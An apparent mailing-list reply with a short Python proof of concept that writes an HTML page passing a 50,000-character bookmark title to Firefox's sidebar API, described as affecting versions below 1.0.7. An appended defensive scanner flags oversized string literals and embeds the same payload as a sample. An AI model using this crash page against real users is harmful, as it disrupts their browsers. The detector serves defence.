Hello Sumit,
I saw this some time ago too, and as far as I know the code below would do the same
with versions below 1.0.7. As I remember, all input fields were "vulnerable". I have
chosen the bookmark "name" field, which will pop up after loading with a long buffer.
# Writes firefox.html: a page whose onload handler calls bookmarksite()
# with a 50000-character bookmark title.
buff = 'A' * 50000
html = open("firefox.html", "w")
html.write("<html><head>\n"
"<script type=\"text/javascript\">\n"
"function bookmarksite(title, url){\n"
"if (document.all)\n"
"window.external.AddFavorite(url, title);\n"
"else if (window.sidebar)\n"
"window.sidebar.addPanel(title, url, \"\")}\n"
"</script></head>\n"
"<body onload=\"bookmarksite('"+buff+"', 'http://www.mozilla.org')\">\n"
"</body></html>")
html.close()
Regards,
Casiamo
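Added example, not part of the original message: a static check a proxy or mail gateway could run to flag pages like the one generated above, where an event handler or script passes an oversized string literal. The 2048-character threshold, the names HandlerScanner and oversized_literals, and the sample page are assumptions made for this illustration.

```python
import re
from html.parser import HTMLParser

MAX_LITERAL = 2048  # assumed threshold; tune to what your environment considers normal

# A single- or double-quoted JavaScript string literal, allowing backslash escapes.
STRING_RE = re.compile(r"'((?:[^'\\]|\\.)*)'" r'|"((?:[^"\\]|\\.)*)"', re.S)


class HandlerScanner(HTMLParser):
    """Collects JavaScript found in on* attributes and in <script> bodies."""

    def __init__(self):
        super().__init__()
        self.in_script = False
        self.snippets = []  # (location, javascript source)

    def handle_starttag(self, tag, attrs):
        self.in_script = tag == "script"
        for name, value in attrs:
            if name.startswith("on") and value:
                self.snippets.append((f"<{tag} {name}>", value))

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.in_script:
            self.snippets.append(("<script>", data))


def oversized_literals(html_text, limit=MAX_LITERAL):
    """Return (location, length) for every string literal longer than limit."""
    scanner = HandlerScanner()
    scanner.feed(html_text)
    scanner.close()
    hits = []
    for where, js in scanner.snippets:
        for m in STRING_RE.finditer(js):
            literal = m.group(1) if m.group(1) is not None else m.group(2)
            if len(literal) > limit:
                hits.append((where, len(literal)))
    return hits


# Constructed sample with the same shape as the page written by the script above.
SAMPLE = ("<html><head><script type=\"text/javascript\">"
          "function bookmarksite(title, url){ window.sidebar.addPanel(title, url, \"\") }"
          "</script></head><body onload=\"bookmarksite('" + "A" * 50000 +
          "', 'http://www.mozilla.org')\"></body></html>")

if __name__ == "__main__":
    print(oversized_literals(SAMPLE))
```

The check only sees literals present in the markup; a string assembled at run time inside the script would need a length limit enforced in the browser or application itself.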
